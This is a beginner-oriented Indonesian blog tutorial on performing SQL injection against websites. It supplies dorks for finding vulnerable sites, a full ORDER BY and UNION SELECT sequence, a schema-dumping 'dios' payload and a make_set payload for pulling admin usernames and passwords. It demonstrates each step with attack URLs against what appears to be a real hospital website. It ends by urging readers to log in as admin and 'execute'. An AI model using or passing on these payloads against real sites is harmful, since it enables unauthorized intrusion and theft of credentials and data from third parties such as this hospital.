Apa itu Sql Injection? Bagaimana Cara melakukannya?



 Assalamualaikum Wr.wb

Perkenalkan Nama Saya Chokka ,Pada Kessempatan Kali ini Saya Akan Jelaskan Tentang Dan Bagaimana Cara Melakukan Sql injection

Apa itu sql injection?

Yah Mungkin Kalian Sudah tidak asing lagi dengan bug yang satu ini 

 SQL Injection merupakan teknik eksploitasi dengan cara memodifikasi perintah sql pada form input aplikasi yang memungkinkan penyerang untuk dapat mengirimkan sintaks ke database aplikasi.

Bug sql injection ini sangat berbahaya karena si penyerang bisa saja meretas atau Memasuki halaman Admin website


Pokonya kurang lebih kaya gitu tanpa banyak cing cong Langsung aja Cara Melalukan Sql injectionnya ya 


Pertama-tama kalian siapkan dulu bahan bahannya yaitu :

-internet

-chrome/browser

-Dork

-dios


Dorkingan sql injectionnya   :

Inurl:/php?id=

Selebihnya cek saja Pastebin saya linknya dibawah

https://pastebin.com/PeR9tRUr


kalau sudah langsung aja buka chrome atau browser Kalian Terus Dorking contoh :


Lalu pilih targetnya yang kalian inginkan  Lanjut

Nah Bg Gimana Cara Cek Web tsb vuln atau enggak,

Caranya mengeceknya Gampang yak Tinggal kalian Kasih tanda petik satu (') di ujung url/parameter misalnya 

https://webyanglutarget.com/php?id=1

Menjadi 

https://webyanglutarget.com/php?id=1'

Dan Jika di enter maka url/parameternya jadi berubah yang tadinya tanda petik (') menjadi ℅27 misal

https://webyanglutarget.com/php?id=1%27

Kalo udh gitu gimana bang?
Ya tinggal Cek aja Tampilan webnya berubah atau enggak Kalau berubah berarti web tersebut Vuln terhadap sql injection  contohnya :
Nah yang  Tampilan Awalnya Seperti ini 

Menjadi seperti ini 
Yak kurang lebih seperti itu Cara mengecek Vulnerability atau kerentanan sql injection
Lanjut kita cari columnya

Lanjut Kita tambahkan lagi di urlnya begini

+order+by+1--+-

Contoh:

https://webyanglutarget.com/php?id=1'+order+by+1--+-


Nah Jika Tampilan Websitenya Tidak Error Atau tampilannya seperti utama Berarti Kita tambahkan lagi nombernya misal

+order+by+2--+-

Contoh:

https://webyanglutarget.com/php?id=1'+order+by+2--+-

Kalo 2 masih belum error maka 3 kalo 3 belum error maka 4 pokonya angkanya terus lanjut kalo masih belum error

 pokonya kalo di angka atasnya tersebut error berarti angka di bawahnya adalah jumlah colomnya

Misalnya Errornya di 9 berarti Colomnya ada 8 ya

Contoh gw pake web target :

https://www.rsudkarawang.id/slide.php?id=3%27+order+by+8--+-

Web ini jumlah coloumnya ada 8 jika di ganti 9 maka error 

Lanjut kita cari angka sql nya 


Nah kan tadi udah tau tuh coloumnya ada 8 langsung aja kita ganti +order+by+ nya menjadi:

+union+select+

kita tambahkan jumlah Coloumnya contoh:

1,2,3,4,5,6,7,8 (jumlah coloum web yang tdi kita tulis ulang)


https://www.rsudkarawang.id/slide.php?id=3%27+union+select+1,2,3,4,5,6,7,8--+-

Dan jangan lupa di belakang parameter atau angka 3 itu tuh kita tambahkan/tulis tanda strip (-)

Contoh:

https://www.rsudkarawang.id/slide.php?id=-3%27+union+select+1,2,3,4,5,6,7,8--+-

Lanjut enter saja

Nah Otomatis Angka Togel tsb muncul ya

Langsung Saja Pilih Nomber togel'' tsb Misal gw pilih nomber 3 ya Kita hapus no 3 tsb lalu kita isi pake dios kalian Kalo tidak punya dios Sans Gw kasih

Dios :

(select+group_concat(table_name,' :: ',column_name+SEPARATOR+'<br>') from information_schema.columns where table_schema=database())

Ya kalo punya,pake dios sendiri

Contoh:

https://www.rsudkarawang.id/slide.php?id=-3%27+union+select+1,2,(select+group_concat(table_name,' :: ',column_name+SEPARATOR+'<br>') from information_schema.columns where table_schema=database()),4,5,6,7,8--+-


Dan hasilnya :



Database dari Web tersebut Akan Muncul  

Terus Gimana lagi bg?

Lanjut Kita Dump username sama passwordnya

Caranya?

Bisa kita liat di database tersebut bila ada tulisan nama user pass atau semacamnya 

Username password di web target tsb 


Yapp data adminya adalah 

adm_web 

usrname

Pass

Nama

email

Disini kita dump saja Username Sama Password

Caranya? 

Ganti diosnya menjadi:

make_set(6,@:=0x0a,(select(1)from(adm_web)where@:=make_set(511,@,0x3c6c693e,usrname,pass)),@)

Nah nantinya akan muncul username dan password

Karena web tsb tidak bisa di dump ya skip ae

Kalo udh dapet username Sama Password Cari admin login aja Trus eksekusi :v 


Mungkin cukup Sekian Cara Sql Injection Bagi pemula

Mohon Maaf Jika ada kekurangan Kata Atau ada kata yang membuat kalian tersinggung dan Nantikan artikel selanjutnya...

See you next time